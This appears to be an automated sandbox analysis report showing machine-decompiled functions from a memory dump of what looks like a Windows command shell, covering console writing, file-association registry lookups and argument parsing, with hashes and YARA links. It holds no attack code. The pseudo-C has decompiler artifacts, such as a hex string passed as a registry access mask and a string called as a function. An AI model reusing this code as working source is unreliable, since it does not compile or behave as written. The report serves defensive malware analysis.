                                • Opcode ID: 57776a5b65b2653787cdb92caac3f8fa10bfd762300c29d76fd6a49a2ce54712
                                • Instruction ID: eed7e053f58d20cb1f3ca210a7f97718c60faf749f79246947dd7d332cd05f68
                                • Opcode Fuzzy Hash: 57776a5b65b2653787cdb92caac3f8fa10bfd762300c29d76fd6a49a2ce54712
                                • Instruction Fuzzy Hash: 0A716C74500302EFEB219F20CB44A697BB8FF91324F12852BE499EB5ACE774D995CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55A995, Relevance: 9.2, APIs: 6, Instructions: 182COMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E4A55A995(void* __ecx, intOrPtr _a4) {
				void _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t37;
				void* _t38;
				long _t39;
				void* _t57;
				int _t58;
				void* _t61;
				void* _t63;
				int _t68;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t85;
				intOrPtr _t88;
				signed int _t92;
				signed int _t95;

				_t72 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(_t68);
				_t88 = _a4;
				if(E4A554490(E4A55AA4F(_t88), 1) != 0) {
					_t84 =  *(_t88 + 0x10);
					_t37 = _t84 +  *(_t88 + 8) * 2;
					_v12 = _t37;
					while(_t84 < _t37) {
						_t68 = _t84;
						if(_t84 >= _t37) {
							goto L3;
						} else {
							while( *_t68 != 0x2022) {
								_t68 = _t68 + 2;
								if(_t68 < _t37) {
									continue;
								}
								break;
							}
							if(_t68 == _t84) {
								goto L19;
							} else {
								_t63 =  &_v8;
								_t95 = _t68 - _t84 >> 1;
								__imp___get_osfhandle(_t84, _t95, _t63, 0);
								_t72 = 1;
								if(WriteConsoleW(_t63, ??, ??, ??, ??) == 0 || _v8 != _t95) {
									L27:
									_t88 = _a4;
									goto L28;
								} else {
									_t88 = _a4;
									_t84 = _t68;
									L19:
									while(_t68 < _v12) {
										if( *_t68 == 0x2022) {
											_t68 = _t68 + 2;
											continue;
										}
										break;
									}
									if(_t68 == _t84) {
										L24:
										_t37 = _v12;
										continue;
									} else {
										E4A56EA77(_t88);
										_t57 =  &_v8;
										_t92 = _t68 - _t84 >> 1;
										__imp___get_osfhandle(_t84, _t92, _t57, 0);
										_t72 = 1;
										_t58 = WriteConsoleW(_t57, ??, ??, ??, ??);
										_t84 = _t58;
										_t59 = E4A551605();
										if(_t58 == 0 || _v8 != _t92) {
											goto L27;
										} else {
											_t88 = _a4;
											_t84 = _t68;
											goto L24;
										}
									}
								}
							}
						}
						L36:
					}
				} else {
					if(E4A55453E( *(_t88 + 8) +  *(_t88 + 8), 1,  *(_t88 + 0x10),  *(_t88 + 8) +  *(_t88 + 8),  &_v8) == 0) {
						L28:
						if(E4A553B03(_t59, _t72, 1) == 0) {
							_t61 = E4A556BEA(_t60, 1);
							if(_t61 == 0) {
								_push(_t61);
								_push(0x70);
								goto L32;
							}
						} else {
							_push(0);
							_push(0x1d);
							L32:
							E4A556D44(_t72);
							_pop(_t72);
						}
						_t37 = E4A56FCA6(_t68, _t72, _t78, _t84, _t88);
					} else {
						_t67 =  *(_t88 + 8);
						_t59 =  *(_t88 + 8) + _t67;
						if(_v8 !=  *(_t88 + 8) + _t67) {
							goto L28;
						}
					}
				}
				L3:
				_t38 = E4A554490(_t37, 1);
				_t39 = 0x4a5745a8;
				_t7 = _t39 + 2; // 0x4a5745aa
				_t85 = _t7;
				if(_t38 != 0) {
					do {
						_t79 =  *_t39;
						_t39 = _t39 + 2;
					} while (_t79 != 0);
					__imp___get_osfhandle(0);
					WriteConsoleW(_t39 - _t85 >> 1, 1, 0x4a5745a8, _t39 - _t85 >> 1,  &_v8);
				} else {
					do {
						_t81 =  *_t39;
						_t39 = _t39 + 2;
					} while (_t81 != 0);
					E4A55453E((_t39 - _t85 >> 1) + (_t39 - _t85 >> 1), 1, 0x4a5745a8, (_t39 - _t85 >> 1) + (_t39 - _t85 >> 1),  &_v8);
				}
				 *(_t88 + 4) =  *(_t88 + 4) + E4A55A8A9(_t88,  *(_t88 + 0x10)) + 1;
				E4A55AA4F(_t88);
				if( *(_t88 + 4) >  *((intOrPtr*)(_t88 + 0x1c))) {
					 *(_t88 + 4) =  *(_t88 + 4) & 0x00000000;
				}
				 *( *(_t88 + 0x10)) = 0;
				 *(_t88 + 8) =  *(_t88 + 8) & 0;
				return 0;
				goto L36;
			}























                                0x4a55a995
                                0x4a55a99a
                                0x4a55a99b
                                0x4a55a99c
                                0x4a55a99e
                                0x4a55a9b1
                                0x4a567af1
                                0x4a567af7
                                0x4a567afa
                                0x4a567b9f
                                0x4a567b02
                                0x4a567b06
                                0x00000000
                                0x4a567b0c
                                0x4a567b0c
                                0x4a567b17
                                0x4a567b1a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a567b1a
                                0x4a567b1e
                                0x00000000
                                0x4a567b20
                                0x4a567b24
                                0x4a567b2a
                                0x4a567b30
                                0x4a567b36
                                0x4a567b40
                                0x4a567bac
                                0x4a567bac
                                0x00000000
                                0x4a567b47
                                0x4a567b47
                                0x4a567b4a
                                0x00000000
                                0x4a567b5a
                                0x4a567b56
                                0x4a567b59
                                0x00000000
                                0x4a567b59
                                0x00000000
                                0x4a567b56
                                0x4a567b61
                                0x4a567b9c
                                0x4a567b9c
                                0x00000000
                                0x4a567b63
                                0x4a567b64
                                0x4a567b6d
                                0x4a567b73
                                0x4a567b79
                                0x4a567b7f
                                0x4a567b81
                                0x4a567b87
                                0x4a567b89
                                0x4a567b90
                                0x00000000
                                0x4a567b97
                                0x4a567b97
                                0x4a567b9a
                                0x00000000
                                0x4a567b9a
                                0x4a567b90
                                0x4a567b61
                                0x4a567b40
                                0x4a567b1e
                                0x00000000
                                0x4a567b06
                                0x4a55a9b7
                                0x4a55a9cd
                                0x4a567baf
                                0x4a567bb8
                                0x4a567bc2
                                0x4a567bc9
                                0x4a567bcb
                                0x4a567bcc
                                0x00000000
                                0x4a567bcc
                                0x4a567bba
                                0x4a567bba
                                0x4a567bbc
                                0x4a567bce
                                0x4a567bce
                                0x4a567bd4
                                0x4a567bd4
                                0x4a567bd5
                                0x4a55a9d3
                                0x4a55a9d3
                                0x4a55a9d6
                                0x4a55a9db
                                0x00000000
                                0x00000000
                                0x4a55a9db
                                0x4a55a9cd
                                0x4a55a9e1
                                0x4a55a9e3
                                0x4a55a9ef
                                0x4a55a9f1
                                0x4a55a9f1
                                0x4a55a9f4
                                0x4a567bdf
                                0x4a567bdf
                                0x4a567be3
                                0x4a567be4
                                0x4a567bf7
                                0x4a567bff
                                0x4a55a9fa
                                0x4a55a9fa
                                0x4a55a9fa
                                0x4a55a9fe
                                0x4a55a9ff
                                0x4a55aa12
                                0x4a55aa12
                                0x4a55aa21
                                0x4a55aa25
                                0x4a55aa30
                                0x4a55fd88
                                0x4a55fd88
                                0x4a55aa3b
                                0x4a55aa3e
                                0x4a55aa47
                                0x00000000

                                APIs
                                  • Part of subcall function 4A554490: _get_osfhandle.MSVCRT ref: 4A55449A
                                  • Part of subcall function 4A554490: GetFileType.KERNEL32 ref: 4A5544A9
                                • _get_osfhandle.MSVCRT ref: 4A567B30
                                • WriteConsoleW.KERNEL32 ref: 4A567B38
                                • _get_osfhandle.MSVCRT ref: 4A567B79
                                • WriteConsoleW.KERNEL32 ref: 4A567B81
                                  • Part of subcall function 4A55453E: _get_osfhandle.MSVCRT ref: 4A554550
                                  • Part of subcall function 4A55453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A576640,00002000,00000000,00000000,00000001,?,?,4A55596D,00000001,?,?,?,00000001), ref: 4A55459B
                                  • Part of subcall function 4A55453E: WriteFile.KERNEL32(?,4A576640,-00000001,4A564FE5,00000000), ref: 4A5545AE
                                • _get_osfhandle.MSVCRT ref: 4A567BF7
                                • WriteConsoleW.KERNEL32 ref: 4A567BFF
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle$Write$Console$File$ByteCharMultiTypeWide
                                • String ID:
                                • API String ID: 2401993446-0
                                • Opcode ID: b847992c25964bf9f0be338d8af4b4a1861223b3501ba8cea13e9e26ae6fb171
                                • Instruction ID: bd1c2ffe1225d6ffc53ae1344e40a6d467d297e2b648bc4b5da6e30620c8afea
                                • Opcode Fuzzy Hash: b847992c25964bf9f0be338d8af4b4a1861223b3501ba8cea13e9e26ae6fb171
                                • Instruction Fuzzy Hash: 965106B1501311BFE711AA64CF49BAA3BB9EF40314F110616F90ADB499FB70EE40C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56E7A2, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp$iswspace
                                • String ID: KEYS$LIST$OFF
                                • API String ID: 759518647-4129271751
                                • Opcode ID: e20f7bb800c88ade4dc235f85e95db97b820ae218abc0d053e1c2cd5c4fa0e2a
                                • Instruction ID: 12bd850f47a052f63ea13d19cac70fe7b3d79f860985cf362d4546d746431faf
                                • Opcode Fuzzy Hash: e20f7bb800c88ade4dc235f85e95db97b820ae218abc0d053e1c2cd5c4fa0e2a
                                • Instruction Fuzzy Hash: DA11AB7251E212B9B2152662DF45DAB2FBCEF827B0B15442BE908EF484EA645C4087A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56D88B, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E4A56D88B(void* _a4, short* _a8) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				intOrPtr* _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				short* _t50;
				signed int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t64;
				signed int _t74;
				signed int _t79;
				signed int _t86;
				signed int _t87;
				intOrPtr* _t88;
				char* _t92;
				signed int _t95;
				intOrPtr* _t100;
				signed int _t107;
				void* _t108;
				void* _t111;
				signed int _t112;
				intOrPtr _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t118;
				void* _t119;
				void* _t120;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				void* _t126;

				_t48 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t48 ^ _t125;
				_t50 = _a8;
				_t108 = _a4;
				_t121 = 0;
				_v536 = _t108;
				if(_t50 != 0) {
					__eflags =  *_t50 - 0x2e;
					if( *_t50 != 0x2e) {
						_t107 = E4A5519D6(E4A552B0D(_t50, 0));
						_v532 = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							L19:
							_t54 = 1;
							L42:
							return E4A5513A9(_t54, _t107, _v8 ^ _t125, _t118, _t121, _t122);
						}
						_t56 = E4A552148(_t107, 0x20);
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = 0;
							 *_t56 = 0;
						}
						_t57 = _t107;
						_t30 = _t57 + 2; // 0x2
						_t119 = _t30;
						do {
							_t111 =  *_t57;
							_t57 = _t57 + 2;
							__eflags = _t111 - _t121;
						} while (_t111 != _t121);
						_t59 = _t57 - _t119;
						__eflags = _t59;
						_t121 = L"\\Shell\\Open\\Command";
						_t118 = _t59 >> 1;
						_t61 = L"\\Shell\\Open\\Command";
						_t112 = _t61 + 2;
						do {
							_t123 =  *_t61;
							_t61 = _t61 + 2;
							__eflags = _t123;
						} while (_t123 != 0);
						_t64 = _t61 - _t112 >> 1;
						_push(_t107);
						__eflags = _t64 + _t118 + 1 - 0x104;
						if(_t64 + _t118 + 1 <= 0x104) {
							_push(0x104);
							_push( &_v528);
							E4A55185A();
							E4A5520A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t107 = RegOpenKeyExW(_v536,  &_v528, 0, "effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0",  &_v548);
							__eflags = _t107;
							if(__eflags == 0) {
								_push( &_v528);
								_push(_v536);
								_t74 = E4A56D003(_t107, _t121, 0x104, __eflags);
								_t122 = _t74;
								__eflags = _t122;
								if(_t122 == 0) {
									L39:
									E4A556D44(_t112, 0x400023a5, 1, _v532);
									L40:
									E4A55142E(_t122);
									E4A55142E(_v532);
									L41:
									_t54 = _t107;
									goto L42;
								}
								_t43 = _t74 + 2; // 0x2
								_t118 = _t43;
								do {
									_t112 =  *_t74;
									_t74 = _t74 + 2;
									__eflags = _t112;
								} while (_t112 != 0);
								_t79 = _t74 - _t118;
								__eflags = _t79;
								if(_t79 == 0) {
									goto L39;
								}
								_push(_t122);
								E4A5558F3(L"%s=%s\r\n", _v532);
								goto L40;
							}
							E4A556D44(_t112, 0x400023a5, 1, _v532);
							_t122 = _t107;
							_t107 = _v532;
							L31:
							E4A55142E(_t107);
							_t54 = _t122;
							goto L42;
						}
						_push(1);
						_push(0x400023db);
						E4A556D44(_t112);
						_t122 = 0x7b;
						goto L31;
					}
					E4A556D44(_t108, 0x400023a5, 1, _t50);
					_t54 = 0x7b;
					goto L42;
				}
				_t122 = 0x104;
				_push(0x104);
				_t86 =  &_v528;
				_push(_t86);
				_push(0);
				_push(_t108);
				_v532 = 0;
				"J$WJT$WJ^$WJh$WJr$WJ|$WJ"();
				_t107 = _t86;
				if(_t107 != 0) {
					L17:
					if(_t107 == 0x103) {
						_t107 = 0;
					}
					goto L41;
				} else {
					_t121 = L"\\Shell\\Open\\Command";
					do {
						if(_v528 == 0x2e) {
							L15:
							if( *0x4a5741b4 != 0) {
								goto L19;
							}
							goto L16;
						}
						_t88 =  &_v528;
						_t9 = _t88 + 2; // 0x30
						_t120 = _t9;
						do {
							_t114 =  *_t88;
							_t88 = _t88 + 2;
						} while (_t114 != 0);
						_t107 = _t88 - _t120 >> 1;
						_t92 = _t121;
						_t115 =  &(_t92[2]);
						do {
							_t118 =  *_t92;
							_t92 =  &(_t92[2]);
						} while (_t118 != 0);
						_t95 = _t92 - _t115 >> 1;
						_t137 = _t95 + _t107 + 1 - _t122;
						if(_t95 + _t107 + 1 > _t122) {
							goto L15;
						}
						E4A5520A9(_t122,  &_v528, _t122, _t121);
						_push( &_v528);
						_push(_v536);
						_t100 = E4A56D003(_t107, _t121, _t122, _t137);
						_v540 = _t100;
						 *((short*)(_t125 + _t107 * 2 - 0x20c)) = 0;
						if(_t100 == 0) {
							L14:
							E4A55142E(_v540);
							goto L15;
						}
						_t20 = _t100 + 2; // 0x2
						_t118 = _t20;
						do {
							_t117 =  *_t100;
							_t100 = _t100 + 2;
						} while (_t117 != 0);
						if(_t100 != _t118) {
							_push(_v540);
							E4A5558F3(L"%s=%s\r\n",  &_v528);
							_t126 = _t126 + 0xc;
						}
						goto L14;
						L16:
						_v532 = _v532 + 1;
						_push(_t122);
						_t87 =  &_v528;
						_push(_t87);
						_push(_v532);
						_push(_v536);
						"J$WJT$WJ^$WJh$WJr$WJ|$WJ"();
						_t107 = _t87;
					} while (_t107 == 0);
					goto L17;
				}
			}











































                                0x4a56d896
                                0x4a56d89d
                                0x4a56d8a0
                                0x4a56d8a3
                                0x4a56d8a9
                                0x4a56d8ab
                                0x4a56d8b3
                                0x4a56d9df
                                0x4a56d9e3
                                0x4a56da0a
                                0x4a56da0c
                                0x4a56da12
                                0x4a56da14
                                0x4a56d9d7
                                0x4a56d9d9
                                0x4a56db48
                                0x4a56db56
                                0x4a56db56
                                0x4a56da19
                                0x4a56da1e
                                0x4a56da20
                                0x4a56da22
                                0x4a56da24
                                0x4a56da24
                                0x4a56da27
                                0x4a56da29
                                0x4a56da29
                                0x4a56da2c
                                0x4a56da2c
                                0x4a56da30
                                0x4a56da31
                                0x4a56da31
                                0x4a56da36
                                0x4a56da36
                                0x4a56da3a
                                0x4a56da3f
                                0x4a56da41
                                0x4a56da43
                                0x4a56da46
                                0x4a56da46
                                0x4a56da4a
                                0x4a56da4b
                                0x4a56da4b
                                0x4a56da52
                                0x4a56da5d
                                0x4a56da5e
                                0x4a56da60
                                0x4a56da81
                                0x4a56da88
                                0x4a56da89
                                0x4a56da97
                                0x4a56dabd
                                0x4a56dabf
                                0x4a56dac1
                                0x4a56dae8
                                0x4a56dae9
                                0x4a56daef
                                0x4a56daf4
                                0x4a56daf6
                                0x4a56daf8
                                0x4a56db20
                                0x4a56db2d
                                0x4a56db32
                                0x4a56db36
                                0x4a56db41
                                0x4a56db46
                                0x4a56db46
                                0x00000000
                                0x4a56db46
                                0x4a56dafa
                                0x4a56dafa
                                0x4a56dafd
                                0x4a56dafd
                                0x4a56db01
                                0x4a56db02
                                0x4a56db02
                                0x4a56db07
                                0x4a56db07
                                0x4a56db0b
                                0x00000000
                                0x00000000
                                0x4a56db0d
                                0x4a56db19
                                0x00000000
                                0x4a56db19
                                0x4a56dad0
                                0x4a56dad5
                                0x4a56dad7
                                0x4a56da74
                                0x4a56da75
                                0x4a56da7a
                                0x00000000
                                0x4a56da7a
                                0x4a56da62
                                0x4a56da64
                                0x4a56da69
                                0x4a56da73
                                0x00000000
                                0x4a56da73
                                0x4a56d9ed
                                0x4a56d9f7
                                0x00000000
                                0x4a56d9f7
                                0x4a56d8b9
                                0x4a56d8be
                                0x4a56d8bf
                                0x4a56d8c5
                                0x4a56d8c6
                                0x4a56d8c7
                                0x4a56d8c8
                                0x4a56d8ce
                                0x4a56d8d4
                                0x4a56d8d8
                                0x4a56d9c4
                                0x4a56d9ca
                                0x4a56d9d0
                                0x4a56d9d0
                                0x00000000
                                0x4a56d8de
                                0x4a56d8de
                                0x4a56d8e3
                                0x4a56d8eb
                                0x4a56d991
                                0x4a56d998
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56d998
                                0x4a56d8f1
                                0x4a56d8f7
                                0x4a56d8f7
                                0x4a56d8fa
                                0x4a56d8fa
                                0x4a56d8fe
                                0x4a56d8ff
                                0x4a56d908
                                0x4a56d90a
                                0x4a56d90c
                                0x4a56d90f
                                0x4a56d90f
                                0x4a56d913
                                0x4a56d914
                                0x4a56d91b
                                0x4a56d921
                                0x4a56d923
                                0x00000000
                                0x00000000
                                0x4a56d92e
                                0x4a56d939
                                0x4a56d93a
                                0x4a56d940
                                0x4a56d947
                                0x4a56d94d
                                0x4a56d957
                                0x4a56d986
                                0x4a56d98c
                                0x00000000
                                0x4a56d98c
                                0x4a56d959
                                0x4a56d959
                                0x4a56d95c
                                0x4a56d95c
                                0x4a56d960
                                0x4a56d961
                                0x4a56d96a
                                0x4a56d96c
                                0x4a56d97e
                                0x4a56d983
                                0x4a56d983
                                0x00000000
                                0x4a56d99a
                                0x4a56d99a
                                0x4a56d9a0
                                0x4a56d9a1
                                0x4a56d9a7
                                0x4a56d9a8
                                0x4a56d9ae
                                0x4a56d9b4
                                0x4a56d9ba
                                0x4a56d9bc
                                0x00000000
                                0x4a56d8e3

                                APIs
                                Strings
                                • %s=%s, xrefs: 4A56D979, 4A56DB14
                                • effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0, xrefs: 4A56DAA3
                                • \Shell\Open\Command, xrefs: 4A56D8DE, 4A56D925, 4A56DA3A, 4A56DA8E
                                • ., xrefs: 4A56D8E3
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Open
                                • String ID: %s=%s$.$\Shell\Open\Command$effff13300300c3010000020000112001000000fe0e00003800000000fe0c00004508000000820100000c010000b000000090000000050000001a000000730100004e010000387@010000032825020006395b000000200700000038c1ffffff02280f0200067c3f0000047b3@0000040374250000026fbc0000067c3f0000047b3@0
                                • API String ID: 71445658-568813671
                                • Opcode ID: ead2ddaa53ae5ee166e0ec795e37914ee90e544474644a5363b99e5a4d5980dc
                                • Instruction ID: 32ee320049c2997cd02777c02fd8c630163b62b878b1c10f4c82087bc7ec0d26
                                • Opcode Fuzzy Hash: ead2ddaa53ae5ee166e0ec795e37914ee90e544474644a5363b99e5a4d5980dc
                                • Instruction Fuzzy Hash: 2B712E7790161AABDB21AB54CD88EEA7B7DEF84300F0449A5E50DEF159E7708F84CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5541DD, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 193COMMON
                                Download Yara Rule
                                C-Code - Quality: 91%
                                			E4A5541DD(intOrPtr _a4, long _a8) {
				signed int _v8;
				short _v528;
				signed int _v529;
				char _v530;
				char _v531;
				signed int _v536;
				long _v540;
				signed int __ebx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				long _t80;
				signed int _t81;
				signed int _t82;
				signed int _t85;
				long _t86;
				long _t88;
				long _t90;
				signed int _t98;
				long _t99;
				long _t100;
				long _t102;
				void* _t103;
				long _t109;
				void* _t111;
				signed int _t112;
				long _t113;
				intOrPtr _t114;
				signed int _t115;

				_t73 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t73 ^ _t115;
				_v536 = _v536 | 0xffffffff;
				_t114 = _a4;
				_v540 = _a8;
				_v529 = 0;
				_t102 = 0;
				while(1) {
					__ecx =  *((intOrPtr*)(__esi + 0x38));
					__edi =  *(__ecx + __ebx * 2) & 0x0000ffff;
					__eflags = __di - 0x22;
					if(__di == 0x22) {
						__eflags = _v529;
						__eax = __eax & 0xffffff00 | _v529 == 0x00000000;
						__eflags = __al;
						_v529 = __al;
						__eax = __eax & 0xffffff00 | __al == 0x00000000;
					}
					__eflags = __di;
					if(__di == 0) {
						break;
					}
					__eflags = _v529;
					if(_v529 != 0) {
						L8:
						__eflags = _v536 - 0xffffffff;
						if(_v536 != 0xffffffff) {
							L10:
							__al = 0;
							 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __di;
							__ebx = __ebx + 1;
							__eflags = __ebx - 0x103;
							if(__ebx < 0x103) {
								continue;
							}
							break;
						}
						__eax = E4A5518EB(":.\", __edi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *0x4a574081;
							if( *0x4a574081 == 0) {
								break;
							}
							_v536 = __ebx;
						}
						goto L10;
					}
					__eflags = __al;
					if(__al != 0) {
						goto L8;
					}
					__eax = E4A5518EB(L"=,;+/[] \t\"", __edi);
					__eflags = __eax;
					if(__eax != 0) {
						break;
					}
					goto L8;
				}
				__eflags = __ebx;
				if(__ebx == 0) {
					_t60 = __ebx - 1; // -1
					__eax = _t60;
					L20:
					return E4A5513A9(_t80, _t102, _v8 ^ _t115, _t111, _t113, _t114);
				}
				__eax = 0;
				__eflags = _v536 - 0xffffffff;
				 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __ax;
				if(_v536 != 0xffffffff) {
					__eax =  &_v528;
					__eax = GetFileAttributesW( &_v528);
					__eflags = __eax - 0xffffffff;
					if(__eax != 0xffffffff) {
						if(0 == 0) {
							goto L13;
						}
					}
					_t102 = _v536;
					 *((short*)(_t115 + _t102 * 2 - 0x20c)) = 0;
				}
				L13:
				_t112 = E4A5540F2(0x2a,  &_v528, _v540);
				_v536 = _t112;
				if(_t112 == 0xffffffff) {
					_t80 = E4A5540F2(0x2d,  &_v528, _v540);
					__eflags = _t80 - 0x2d;
					if(_t80 != 0x2d) {
						L15:
						_v529 = 0;
						_v530 = 0;
						if(_t112 == 0xffffffff) {
							_t102 = 0;
							__eflags = 0;
							_v531 = 0;
							do {
								_t81 =  *(_t114 + 0x38);
								_t113 =  *(_t81 + _t102 * 2) & 0x0000ffff;
								__eflags = _t113;
								if(_t113 == 0) {
									L34:
									_v531 = 1;
									goto L32;
								}
								__eflags = _t113 - 0x22;
								if(_t113 == 0x22) {
									__eflags = _v529;
									_t98 = _t81 & 0xffffff00 | _v529 == 0x00000000;
									__eflags = _t98;
									_v529 = _t98;
									_v530 = _t98 == 0;
								}
								__eflags = _v529;
								if(_v529 != 0) {
									L31:
									_t102 = _t102 + 1;
									__eflags = _t102;
									_v530 = 0;
								} else {
									__eflags = _v530;
									if(_v530 != 0) {
										goto L31;
									}
									_t99 = iswspace(_t113);
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									_t100 = E4A5518EB("=,;", _t113);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L34;
									}
									__eflags = _t113 -  *0x4a59065c; // 0x2f
									if(__eflags == 0) {
										goto L34;
									}
									goto L31;
								}
								L32:
								__eflags = _v531;
							} while (_v531 == 0);
						}
						_t82 =  *(_t114 + 0x38);
						_t28 = _t82 + 2; // 0x6
						_t111 = _t28;
						do {
							_t103 =  *_t82;
							_t82 = _t82 + 2;
						} while (_t103 != 0);
						_t85 = _t82 - _t111 >> 1;
						if(_t102 != _t85) {
							_t61 = _t85 + 1; // 0x7
							_t113 = _t61;
							_t86 =  *(_t114 + 0x3c);
							__eflags = _t86;
							if(_t86 == 0) {
								L47:
								_t88 = E4A552041(_t113 + _t113);
								_t102 = _t102 + _t102;
								_v540 = _t88;
								E4A55185A(_t88, _t113,  *(_t114 + 0x38) + _t102);
								_t90 =  *(_t114 + 0x3c);
								__eflags = _t90;
								if(_t90 != 0) {
									E4A5520A9(_t114, _v540, _t113, _t90);
								}
								 *(_t114 + 0x3c) = _v540;
								 *((short*)(_t102 +  *(_t114 + 0x38))) = 0;
								goto L19;
							}
							_t111 = _t86 + 2;
							do {
								_t109 =  *_t86;
								_t86 = _t86 + 2;
								__eflags = _t109;
							} while (_t109 != 0);
							__eflags = _t113;
							goto L47;
						}
						L19:
						_t80 = _v536;
						goto L20;
					}
					goto L20;
				}
				if(_t112 == 0x14) {
					 *((intOrPtr*)(_t114 + 0x40)) = 1;
				}
				goto L15;
			}

































                                0x4a5541e8
                                0x4a5541ef
                                0x4a5541f5
                                0x4a5541fe
                                0x4a554201
                                0x4a55420a
                                0x4a554211
                                0x4a554213
                                0x4a554213
                                0x4a554216
                                0x4a55421a
                                0x4a55421e
                                0x4a55c123
                                0x4a55c12a
                                0x4a55c12d
                                0x4a55c12f
                                0x4a55c135
                                0x4a55c135
                                0x4a554224
                                0x4a554227
                                0x00000000
                                0x00000000
                                0x4a554229
                                0x4a554230
                                0x4a554245
                                0x4a554245
                                0x4a55424c
                                0x4a554261
                                0x4a554261
                                0x4a554263
                                0x4a55426b
                                0x4a55426c
                                0x4a554272
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554272
                                0x4a554254
                                0x4a554259
                                0x4a55425b
                                0x4a555572
                                0x4a555579
                                0x00000000
                                0x00000000
                                0x4a55557f
                                0x4a55557f
                                0x00000000
                                0x4a55425b
                                0x4a554232
                                0x4a554234
                                0x00000000
                                0x00000000
                                0x4a55423c
                                0x4a554241
                                0x4a554243
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554243
                                0x4a554274
                                0x4a554276
                                0x4a56713d
                                0x4a56713d
                                0x4a5542fa
                                0x4a554308
                                0x4a554308
                                0x4a55427c
                                0x4a55427e
                                0x4a554285
                                0x4a55428d
                                0x4a555547
                                0x4a55554e
                                0x4a555554
                                0x4a555557
                                0x4a552cbc
                                0x00000000
                                0x00000000
                                0x4a552cc2
                                0x4a55555d
                                0x4a555565
                                0x4a555565
                                0x4a554293
                                0x4a5542a7
                                0x4a5542a9
                                0x4a5542b2
                                0x4a5554c1
                                0x4a5554c6
                                0x4a5554c9
                                0x4a5542c1
                                0x4a5542c1
                                0x4a5542c8
                                0x4a5542d2
                                0x4a5554d4
                                0x4a5554d4
                                0x4a5554d6
                                0x4a5554dc
                                0x4a5554dc
                                0x4a5554df
                                0x4a5554e3
                                0x4a5554e6
                                0x4a55553e
                                0x4a55553e
                                0x00000000
                                0x4a55553e
                                0x4a5554e8
                                0x4a5554ec
                                0x4a55c13d
                                0x4a55c144
                                0x4a55c147
                                0x4a55c149
                                0x4a55c14f
                                0x4a55c14f
                                0x4a5554f2
                                0x4a5554f9
                                0x4a555528
                                0x4a555528
                                0x4a555528
                                0x4a555529
                                0x4a5554fb
                                0x4a5554fb
                                0x4a555502
                                0x00000000
                                0x00000000
                                0x4a555505
                                0x4a55550c
                                0x4a55550e
                                0x00000000
                                0x00000000
                                0x4a555516
                                0x4a55551b
                                0x4a55551d
                                0x00000000
                                0x00000000
                                0x4a55551f
                                0x4a555526
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555526
                                0x4a555530
                                0x4a555530
                                0x4a555530
                                0x4a555539
                                0x4a5542d8
                                0x4a5542db
                                0x4a5542db
                                0x4a5542de
                                0x4a5542de
                                0x4a5542e2
                                0x4a5542e3
                                0x4a5542ea
                                0x4a5542ee
                                0x4a567145
                                0x4a567145
                                0x4a567148
                                0x4a56714b
                                0x4a56714d
                                0x4a567162
                                0x4a567166
                                0x4a56716e
                                0x4a567175
                                0x4a56717b
                                0x4a567180
                                0x4a567183
                                0x4a567185
                                0x4a56718f
                                0x4a56718f
                                0x4a56719a
                                0x4a5671a2
                                0x00000000
                                0x4a5671a2
                                0x4a56714f
                                0x4a567152
                                0x4a567152
